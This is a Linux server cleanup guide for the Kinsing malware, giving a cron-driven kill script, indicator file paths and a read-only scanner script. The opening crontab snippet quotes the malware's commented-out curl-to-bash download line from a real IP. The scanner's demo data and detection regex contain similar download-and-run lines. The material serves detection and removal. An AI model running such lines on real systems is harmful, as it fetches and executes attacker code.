Too many "solutions" on the internet do not actually resolve the kinsing malware infection. The kinsing malware also infects the network and listens on a network port.
Do not delete the wget or curl URL line that kinsing put in the crontab; just comment it out like below. There are scripts checking the crontab file:
```bash
# your other crontab entries
# * * * * * curl http://185.122.204.197/cp.sh | bash > /dev/null 2>&1
```
You should also set the immutable attribute to prevent the crontab file from being changed (it will still change if kinsing runs; we only tested it):
```bash
# Debian/Ubuntu path for root's crontab; on RHEL/CentOS it is /var/spool/cron/root
chattr +i /var/spool/cron/crontabs/root
```
Create a bash script for the kinsing killer under the root path (use any file name, e.g. /root/killer-kin.sh). Make sure net-utils / net-tools is installed, and put the following file into the cron directory as /etc/cron.d/killer-kin:
```
MAILTO=''
# KILLER
* * * * * root /bin/bash /root/killer-kin.sh
```
/root/killer-kin.sh (executable script):
```bash
#!/bin/bash
# ALSO TEST THE SSH STATUS (pgrep ssh also matches sshd)
STATUS_SSH=$(pgrep ssh)
if [[ "${STATUS_SSH}" = "" ]]; then
    echo "SSH STOPPED! STARTING"
    /usr/bin/systemctl start ssh
else
    echo "SSH RUNNING"
fi
# DELETE PRELOAD LD LIBRARY (kinsing registers /etc/data/libsystem.so here)
echo '' > /etc/ld.so.preload
# BOT SERVICE IS KINSING SERVICE
/usr/bin/systemctl stop bot.service &>/dev/null
/usr/bin/systemctl disable bot.service &>/dev/null
# DELETE BOT SERVICE
echo '' > /lib/systemd/system/bot.service
# KILL THE KINSING FROM NETWORK (netstat comes from net-tools and needs root to show PIDs)
KINSING_PROC=$(netstat -tlp 2>/dev/null | grep kinsing | awk '/kinsing */ {split($NF,a,"/"); print a[1]}')
KDEV_PROC=$(netstat -tlp 2>/dev/null | grep kdevtmpfsi | awk '/kdevtmpfsi */ {split($NF,a,"/"); print a[1]}')
# a single listening PID is expected; several listeners would not match the regex
if [[ $KINSING_PROC =~ ^[0-9]+$ ]]; then
    echo "KINSING FOUND IN NETWORK -> ${KINSING_PROC}"
    kill $KINSING_PROC
fi
if [[ $KDEV_PROC =~ ^[0-9]+$ ]]; then
    echo "KDEVTMPFSI FOUND IN NETWORK -> ${KDEV_PROC}"
    kill $KDEV_PROC
fi
# KILL THE KINSING PROCESS
if [[ $(pgrep kdevtmpfsi) != "" ]]; then
    echo "MALWARE KDEV FOUND"
    kill $(pgrep kdevtmpfsi)
fi
if [[ $(pgrep kinsing) != "" ]]; then
    echo "MALWARE KIN FOUND"
    kill $(pgrep kinsing)
fi
# REMOVE KINSING FROM TMP & DATA DIRECTORY
echo "DELETING KIN"
rm -f /tmp/kdevtmpfsi* /tmp/kinsing* /var/tmp/kinsing* /var/tmp/kdevtmpfsi* /etc/data/kinsing /etc/data/libsystem.so
# LAST ... FIND KINSING IN ANY DIRECTORY
# BUT THIS IS NOT WORTH IT WHEN RUNNING EVERY MINUTE
# (patterns are quoted so the shell does not expand them before find sees them)
#find / -iname 'kdevtmpfsi*' -exec rm -fv {} \;
#find / -iname 'kinsing*' -exec rm -fv {} \;
```
Check whether the file /etc/ld.so.preload contains /etc/data/libsystem.so; commonly the kinsing executable file is /etc/data/kinsing.
- Kinsing executable file: `/etc/data/kinsing`
- Kinsing library file: `/etc/data/libsystem.so` or `/dev/shm/libsystem.so`
- Kinsing prevents the watchdog from running: it opens `/etc/sysctl.conf` and appends `nmi_watchdog=0`
- Temporarily downloaded kinsing files (regex): `(/var)?/tmp/kinsing[0-9]+?` and `(/var)?/tmp/kdevtmpfsi[0-9]+?`
Limit the files
- Edit `/etc/sysctl.conf`, add the config that you need, and then run:
```bash
chattr +i /etc/sysctl.conf
```
- Create empty placeholder files in /tmp:
```bash
echo '' > /tmp/kinsing
echo '' > /tmp/kdevtmpfsi
chattr +i /tmp/kinsing /tmp/kdevtmpfsi
```
- Overwrite kinsing and libsystem.so:
```bash
echo '' > /etc/data/kinsing
echo '' > /etc/data/libsystem.so
chattr +i /etc/data/kinsing /etc/data/libsystem.so
```
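To confirm whether the indicators listed above are still present after cleanup, here is a read-only check script. It is an added example, not part of the original post or the killer-kin.sh script: `kinsing_scan` takes a root prefix (so it can run against a constructed directory tree, built by the hypothetical `make_demo_tree` / `make_clean_tree` helpers below, or against `/` on a live host), looks for each indicator the post names, and only reports, leaving removal to killer-kin.sh. The tree contents, the `placeholder.invalid` URL and the helper names are all constructed for the demo.

```shell
#!/bin/bash
# Added example (not from the original post): read-only scan for the Kinsing
# indicators listed above. ROOT prefix lets it run on a constructed tree or "/".
kinsing_scan() {
    local root="${1:-/}"
    root="${root%/}"
    local hits=0 f d c

    # 1. /etc/ld.so.preload referencing the dropped library
    if [ -f "$root/etc/ld.so.preload" ] && grep -q 'libsystem\.so' "$root/etc/ld.so.preload"; then
        echo "HIT: /etc/ld.so.preload references libsystem.so"; hits=$((hits + 1))
    fi

    # 2. dropped executable / library. Only non-empty files count, so the
    #    empty chattr +i placeholders recommended above are not flagged.
    for f in /etc/data/kinsing /etc/data/libsystem.so /dev/shm/libsystem.so; do
        if [ -s "$root$f" ]; then
            echo "HIT: $f present"; hits=$((hits + 1))
        fi
    done

    # 3. temporary downloads: (/var)?/tmp/kinsing* and (/var)?/tmp/kdevtmpfsi*
    for d in /tmp /var/tmp; do
        for f in "$root$d"/*; do
            case "${f##*/}" in
                kinsing*|kdevtmpfsi*)
                    if [ -s "$f" ]; then
                        echo "HIT: ${f#"$root"} present"; hits=$((hits + 1))
                    fi ;;
            esac
        done
    done

    # 4. watchdog disabled through sysctl.conf (commented lines are ignored)
    if [ -f "$root/etc/sysctl.conf" ] && \
       grep -Eq '^[^#]*nmi_watchdog[[:space:]]*=[[:space:]]*0' "$root/etc/sysctl.conf"; then
        echo "HIT: nmi_watchdog=0 in /etc/sysctl.conf"; hits=$((hits + 1))
    fi

    # 5. live (uncommented) cron lines that pipe curl/wget output into a shell;
    #    the commented-out line the post keeps for the crontab check does not match
    for c in "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/* \
             "$root"/etc/cron.d/* "$root"/etc/crontab; do
        [ -f "$c" ] || continue
        if grep -Eq '^[^#]*(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$c"; then
            echo "HIT: download-and-run cron line in ${c#"$root"}"; hits=$((hits + 1))
        fi
    done

    echo "indicators found: $hits"
}

# Count only the HIT lines so callers get a number instead of the report.
kinsing_hit_count() {
    kinsing_scan "$1" | grep -c '^HIT:' || true
}

# Constructed "infected" tree for the demo: fake placeholder contents, no real malware.
make_demo_tree() {
    local root; root=$(mktemp -d)
    mkdir -p "$root/etc/data" "$root/tmp" "$root/var/spool/cron/crontabs"
    echo '/etc/data/libsystem.so' > "$root/etc/ld.so.preload"
    echo 'placeholder binary' > "$root/etc/data/kinsing"
    echo 'placeholder download' > "$root/tmp/kdevtmpfsi"
    printf 'net.ipv4.ip_forward = 0\nnmi_watchdog=0\n' > "$root/etc/sysctl.conf"
    printf '# * * * * * curl http://placeholder.invalid/cp.sh | bash > /dev/null 2>&1\n* * * * * curl http://placeholder.invalid/cp.sh | bash\n' \
        > "$root/var/spool/cron/crontabs/root"
    echo "$root"
}

# Constructed clean tree: only the empty placeholder files from the post, so no hits.
make_clean_tree() {
    local root; root=$(mktemp -d)
    mkdir -p "$root/etc/data" "$root/tmp"
    : > "$root/etc/ld.so.preload"
    : > "$root/tmp/kinsing"
    : > "$root/tmp/kdevtmpfsi"
    : > "$root/etc/data/kinsing"
    echo "$root"
}

DEMO=$(make_demo_tree)
kinsing_scan "$DEMO"      # reports five HIT lines for the constructed tree
rm -rf "$DEMO"
```

On a real host run `kinsing_scan /` as root (the cron and /dev/shm paths are not readable otherwise). The checks test for non-empty files on purpose: after you have overwritten and chattr'd the placeholders as described above, a clean host produces zero hits, while a new drop into /tmp or /etc/data shows up immediately.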
It is recommended to do a clean install or reinstall the server.